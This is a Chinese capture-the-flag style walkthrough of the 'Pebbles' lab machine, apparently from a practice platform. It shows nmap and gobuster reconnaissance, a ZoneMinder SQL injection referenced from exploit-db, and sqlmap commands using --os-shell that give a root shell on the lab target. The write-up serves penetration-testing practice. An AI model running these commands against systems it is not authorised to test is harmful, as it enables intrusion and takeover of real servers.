简介
point 10
Pebbles
Difficulty Easy
rated by community HARD
实验环境
攻击者 Kali 192.168.45.197
受害者 IP 192.168.171.52 Linux
1. 信息收集
收集受害者服务详情
nmap -sV -A 192.168.171.52
21/tcp open ftp vsftpd 3.0.3
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
8080/tcp open http Apache httpd 2.4.18 ((Ubuntu))
8080端口没用
尝试匿名访问ftp 无效
gobuster爆破 这次需要使用big.txt 否则会漏掉非常重要的内容
gobuster dir -u http://192.168.171.52:3305/ -w /usr/share/dirb/wordlists/big.txt
https://www.exploit-db.com/exploits/41239
这里的POC能尝试Sql注入
view=request&request=log&task=query&limit=100;
sqlmap http://192.168.171.52/zm/index.php --data="view=request&request=log&task=query&limit=100&minTime=5" -p limit
sqlmap http://192.168.171.52/zm/index.php --data="view=request&request=log&task=query&limit=100&minTime=5" -p limit --os-shell
这样 我们就得到了非常垃圾的shell
速度非常缓慢
尝试一般的nc和bash反弹shell都是无效的
幸运的是我们是root可以直接查看flag
但我还是希望能得到好的反弹shell
但是尝试之后还是不行 答案是这样写的
需要先从kali中拿到好的nc 传给受害者
然后受害者用nc反弹shell
我尝试用答案的方法写 仍然无效
© 版权声明
文章版权归作者所有,未经允许请勿转载。
THE END